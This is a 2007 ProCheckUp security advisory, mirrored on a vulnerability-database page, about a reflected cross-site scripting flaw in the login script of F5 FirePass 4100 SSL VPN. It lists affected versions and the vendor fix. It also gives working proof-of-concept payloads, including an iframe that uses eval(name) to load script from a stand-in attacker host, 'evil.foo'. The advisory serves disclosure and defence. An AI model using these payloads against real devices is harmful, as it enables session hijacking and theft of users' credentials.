Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

ProCheckUp Security Advisory 2007.15

🗓️ 02 Dec 2007 00:00:00Reported by ProCheckUpType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

F5 FirePass 4100 SSL VPN XSS vulnerability on 'my.logon.php3' server-side scrip

Show more
Code
`PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script  
  
Date Found: 19th June 2007  
  
Successfully tested on: version 5.5.2  
  
F5 Networks has confirmed the following versions to be vulnerable:  
  
FirePass versions 5.4.1 - 5.5.2  
FirePass versions 6.0 - 6.0.1  
  
  
Description:  
  
F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "my.logon.php3" server-side script.  
  
No authentication is required to exploit this vulnerability.  
  
  
Consequences:  
  
An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain.  
  
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties.   
  
  
Proof of concept (PoC) URL:  
  
https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!--  
  
The payload in the example is   
  
"></script><textarea>HTML_injection_test</textarea><!--  
  
which injects a 'textarea' box  
  
  
The following PoC HTML page would run JavaScript without any restrictions from a third-party file ('http://www.evil.foo/b' in this case):  
  
<html>  
  
<iframe src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe>  
  
</html>  
  
  
  
Successfully tested on:  
  
Server environment:  
  
F5 FirePass 4100  
  
Client environment:  
  
Microsoft Internet Explorer 7.0.5730.11  
  
  
Severity: Medium/High  
  
  
Author: Richard Brain of ProCheckUp Ltd (www.procheckup.com)  
  
With thanks to Petko D. Petkov for suggesting the eval(name) technique.  
  
  
References:  
  
http://www.procheckup.com/Vulnerability_2007.php  
http://www.f5.com/products/FirePass/  
  
  
ProCheckUp thanks F5 Networks for working with us.  
  
  
Fix:  
  
F5 Networks has issued SOL7923:  
  
https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Dec 2007 00:00Current
0.2Low risk
Vulners AI Score0.2
cross-site scriptinghtml injectionf5 firepass 4100ssl vpnvulnerabilityprocheckup ltdinternet explorer 7.0petko d. petkovf5 networkssol7923 fix.
23
.json
Report